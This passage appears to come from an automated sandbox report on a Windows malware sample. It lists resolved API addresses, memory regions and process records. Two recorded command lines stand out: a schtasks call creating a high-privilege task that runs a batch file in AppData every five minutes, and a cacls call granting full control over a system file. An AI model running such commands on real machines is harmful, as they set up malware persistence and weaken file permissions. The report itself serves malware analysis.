| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateThread, address_out = 0x7527fcb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OpenProcess, address_out = 0x752792b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetVersion, address_out = 0x7527a300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateFileW, address_out = 0x75286180 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindResourceW, address_out = 0x75283a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SizeofResource, address_out = 0x75278cb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseHandle, address_out = 0x75285f20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetLastError, address_out = 0x75272af0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadResource, address_out = 0x752778f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x75272db0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x75272da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LockResource, address_out = 0x75277a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCommandLineW, address_out = 0x7527a4b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleW, address_out = 0x75279660 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryW, address_out = 0x7527a0b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStdHandle, address_out = 0x7527a060 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalFree, address_out = 0x752787c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalAlloc, address_out = 0x75278840 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcAddress, address_out = 0x75277940 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleFileNameW, address_out = 0x75279560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleScreenBufferInfo, address_out = 0x752869c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileType, address_out = 0x75286390 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OutputDebugStringW, address_out = 0x752a1c30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleW, address_out = 0x752868e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteConsoleW, address_out = 0x75286920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFilePointerEx, address_out = 0x75286540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnterCriticalSection, address_out = 0x77ce5e80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LeaveCriticalSection, address_out = 0x77ce5e00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetStdHandle, address_out = 0x752a26a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x77cdda90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EncodePointer, address_out = 0x77cff190 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DecodePointer, address_out = 0x77cfa200 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitProcess, address_out = 0x752874f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleExW, address_out = 0x75279fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = MultiByteToWideChar, address_out = 0x75272d60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WideCharToMultiByte, address_out = 0x752775a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x752725e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleMode, address_out = 0x75286870 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleInputA, address_out = 0x752868c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleMode, address_out = 0x75286900 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThread, address_out = 0x75279700 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThreadId, address_out = 0x75271b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitThread, address_out = 0x77d02570 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryExW, address_out = 0x75277920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteCriticalSection, address_out = 0x77cf9920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushFileBuffers, address_out = 0x752862a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteFile, address_out = 0x75286590 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleCP, address_out = 0x75286860 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7527a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x75279680 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadFile, address_out = 0x752864a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStartupInfoW, address_out = 0x7527a080 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = UnhandledExceptionFilter, address_out = 0x752a28e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetUnhandledExceptionFilter, address_out = 0x7527a2c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionAndSpinCount, address_out = 0x75286020 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Sleep, address_out = 0x752777b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateProcess, address_out = 0x7527fbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsAlloc, address_out = 0x75279a70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsGetValue, address_out = 0x75271ba0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsSetValue, address_out = 0x75271da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsFree, address_out = 0x75279930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidCodePage, address_out = 0x7527a090 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetACP, address_out = 0x75278770 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetOEMCP, address_out = 0x7527fd10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCPInfo, address_out = 0x75279fc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x75277910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = RtlUnwind, address_out = 0x75279a80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = QueryPerformanceCounter, address_out = 0x75272dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x75271d90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemTimeAsFileTime, address_out = 0x75272b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetEnvironmentStringsW, address_out = 0x7527a3b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeEnvironmentStringsW, address_out = 0x7527a0f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapReAlloc, address_out = 0x77cdbae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEndOfFile, address_out = 0x752864f0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetTokenInformation, address_out = 0x76a2ed40 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegDeleteKeyW, address_out = 0x76a2fca0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupPrivilegeValueW, address_out = 0x76a295e0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = AdjustTokenPrivileges, address_out = 0x76a30680 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = OpenProcessToken, address_out = 0x76a2ee90 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegSetValueExW, address_out = 0x76a2f0a0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegQueryValueExW, address_out = 0x76a2ed60 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyExW, address_out = 0x76a2ed80 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyW, address_out = 0x76a2f590 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCreateKeyW, address_out = 0x76a306c0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCloseKey, address_out = 0x76a2efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupAccountSidW, address_out = 0x76a2f7b0 |
|
1 | |
| Get Address | c:\windows\syswow64\comdlg32.dll | function = PrintDlgW, address_out = 0x7516c6a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartPage, address_out = 0x770aee10 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndDoc, address_out = 0x770855a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartDocW, address_out = 0x770857e0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = SetMapMode, address_out = 0x77089590 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = GetDeviceCaps, address_out = 0x77080820 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndPage, address_out = 0x770afbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SendMessageW, address_out = 0x771638f0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = DialogBoxIndirectParamW, address_out = 0x7717b6b0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = EndDialog, address_out = 0x7717b430 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = LoadCursorW, address_out = 0x77167740 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = InflateRect, address_out = 0x771774e0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetSysColorBrush, address_out = 0x7717efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetCursor, address_out = 0x77184ed0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetWindowTextW, address_out = 0x77174580 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetDlgItem, address_out = 0x77171540 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoW, address_out = 0x748e1580 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = VerQueryValueW, address_out = 0x748e1500 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoSizeW, address_out = 0x748e1560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsAlloc, address_out = 0x7527a330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsFree, address_out = 0x7527f400 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsGetValue, address_out = 0x75277580 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsSetValue, address_out = 0x75279910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x75286030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventExW, address_out = 0x75285f90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x75285ff0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x7527a5d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x7527a690 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x77cd40f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x77ccd630 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x77ccecf0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x75285720 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolWait, address_out = 0x77cce140 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x77cceb60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x77d09990 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x77d05540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x77cf9dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x7527a550 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x752a0a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x74fa0790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x7527f8a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CompareStringEx, address_out = 0x7527fa30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDateFormatEx, address_out = 0x752a1030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x7527a000 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTimeFormatEx, address_out = 0x752a14b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetUserDefaultLocaleName, address_out = 0x7527a4f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidLocaleName, address_out = 0x752a16f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringEx, address_out = 0x75279970 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentPackageId, address_out = 0x74f23c90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTickCount64, address_out = 0x75278710 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsWow64Process, address_out = 0x752796e0 |
|
1 |
System (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-11-09 19:47:55 (UTC) |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Process #134: schtasks.exe
13
0
| Information | Value |
|---|---|
| ID | #134 |
| File Name | c:\windows\syswow64\schtasks.exe |
| Command Line | schtasks /Create /tn DSHCA /tr "C:\Users\CIiHmnxMn6Ps\AppData\Roaming\zhUe98iP.bat" /sc minute /mo 5 /RL HIGHEST /F |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:02:44, Reason: Child Process |
| Unmonitor | End Time: 00:02:50, Reason: Self Terminated |
| Monitor Duration | 00:00:06 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xb48 |
| Parent PID | 0xd48 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
834
0x
6F8
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| schtasks.exe | 0x008a0000 | 0x008d1fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000a80000 | 0x00a80000 | 0x04a7ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000004a80000 | 0x04a80000 | 0x04a9ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004a80000 | 0x04a80000 | 0x04a8ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000004a90000 | 0x04a90000 | 0x04a93fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004aa0000 | 0x04aa0000 | 0x04aa1fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004aa0000 | 0x04aa0000 | 0x04aa0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000004ab0000 | 0x04ab0000 | 0x04ac3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004ad0000 | 0x04ad0000 | 0x04b0ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004b10000 | 0x04b10000 | 0x04b4ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004b50000 | 0x04b50000 | 0x04b53fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000004b60000 | 0x04b60000 | 0x04b60fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004b70000 | 0x04b70000 | 0x04b71fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004b80000 | 0x04b80000 | 0x04cdffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004b80000 | 0x04b80000 | 0x04bbffff | Private Memory | rw |
|
|
|
- |
| schtasks.exe.mui | 0x04bc0000 | 0x04bd2fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000004be0000 | 0x04be0000 | 0x04cdffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004ce0000 | 0x04ce0000 | 0x04ce0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004cf0000 | 0x04cf0000 | 0x04cfffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x04d00000 | 0x04dbdfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000004dc0000 | 0x04dc0000 | 0x04dfffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004e00000 | 0x04e00000 | 0x04ffffff | Private Memory | rw |
|
|
|
- |
| ole32.dll | 0x04e00000 | 0x04ee8fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000004ff0000 | 0x04ff0000 | 0x04ffffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x05000000 | 0x05336fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| xmllite.dll | 0x74260000 | 0x7428cfff | Memory Mapped File | rwx |
|
|
|
- |
| taskschd.dll | 0x74680000 | 0x7470bfff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74d40000 | 0x74d98fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74da0000 | 0x74da9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74db0000 | 0x74dcdfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x76820000 | 0x768a1fff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x76c40000 | 0x76c82fff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x76c90000 | 0x76d21fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x76d90000 | 0x76e3bfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x76e40000 | 0x76ff9fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x77c30000 | 0x77c3bfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007e960000 | 0x7e960000 | 0x7ea5ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ea60000 | 0x7ea60000 | 0x7ea82fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ea86000 | 0x7ea86000 | 0x7ea86fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ea89000 | 0x7ea89000 | 0x7ea8bfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ea8c000 | 0x7ea8c000 | 0x7ea8efff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ea8f000 | 0x7ea8f000 | 0x7ea8ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7df8ee37ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007df8ee380000 | 0x7df8ee380000 | 0x7ff8ee37ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
COM (8)
| Operation | Class | Interface | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Create | TaskScheduler | ITaskService | cls_context = CLSCTX_INPROC_SERVER, CLSCTX_INPROC_HANDLER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER |
|
1 | |
| Execute | TaskScheduler | ITaskService | method_name = Connect |
|
1 | |
| Execute | TaskScheduler | ITaskService | method_name = GetFolder, new_interface = ITaskFolder |
|
1 | |
| Execute | TaskScheduler | ITaskService | method_name = NewTask, new_interface = ITaskDefinition |
|
1 | |
| Execute | TaskScheduler | ITaskDefinition | method_name = get_Actions, new_interface = IActionCollection |
|
1 | |
| Execute | TaskScheduler | ITaskDefinition | method_name = get_Triggers, new_interface = ITriggerCollection |
|
1 | |
| Execute | TaskScheduler | ITriggerCollection | method_name = Create, type = TASK_TRIGGER_TIME, new_interface = IDailyTrigger |
|
1 | |
| Execute | TaskScheduler | IDailyTrigger | method_name = put_StartBoundary, start_boundary = 2018-11-10T06:47:00 |
|
1 |
File (6)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
2 | |
| Open | STD_OUTPUT_HANDLE | - |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 67 |
|
1 |
Module (3)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\schtasks.exe | base_address = 0x8a0000 |
|
1 | |
| Get Filename | - | process_name = c:\windows\syswow64\schtasks.exe, file_name_orig = C:\Windows\SysWOW64\schtasks.exe, size = 260 |
|
2 |
System (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = Local Time, time = 2018-11-10 06:47:56 (Local Time) |
|
3 |
Process #135: cacls.exe
0
0
| Information | Value |
|---|---|
| ID | #135 |
| File Name | c:\windows\syswow64\cacls.exe |
| Command Line | cacls "C:\Program Files\Windows Photo Viewer\en-US\ImagingDevices.exe.mui" /E /G CIiHmnxMn6Ps:F /C |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:02:45, Reason: Child Process |
| Unmonitor | End Time: 00:02:47, Reason: Self Terminated |
| Monitor Duration | 00:00:02 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x7bc |
| Parent PID | 0xf0 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
660
0x
380
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| cacls.exe | 0x00830000 | 0x00839fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x00000000009d0000 | 0x009d0000 | 0x049cffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x00000000049d0000 | 0x049d0000 | 0x049effff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000049d0000 | 0x049d0000 | 0x049dffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000049e0000 | 0x049e0000 | 0x049e3fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000049f0000 | 0x049f0000 | 0x049f1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000049f0000 | 0x049f0000 | 0x049f3fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004a00000 | 0x04a00000 | 0x04a13fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004a20000 | 0x04a20000 | 0x04a5ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004a60000 | 0x04a60000 | 0x04a9ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004aa0000 | 0x04aa0000 | 0x04aa3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000004ab0000 | 0x04ab0000 | 0x04ab0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004ac0000 | 0x04ac0000 | 0x04ac1fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x04ad0000 | 0x04b8dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000004b90000 | 0x04b90000 | 0x04bcffff | Private Memory | rw |
|
|
|
- |
| cacls.exe.mui | 0x04bd0000 | 0x04bd1fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000004bf0000 | 0x04bf0000 | 0x04bfffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004c00000 | 0x04c00000 | 0x04d3ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004c00000 | 0x04c00000 | 0x04c3ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004c40000 | 0x04c40000 | 0x04d3ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004d40000 | 0x04d40000 | 0x04e3ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x04e40000 | 0x05176fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x74710000 | 0x74737fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74d40000 | 0x74d98fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74da0000 | 0x74da9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74db0000 | 0x74dcdfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76a10000 | 0x76a8afff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x76c40000 | 0x76c82fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x76d90000 | 0x76e3bfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f090000 | 0x7f090000 | 0x7f18ffff | Pagefile Backed Memory | r |
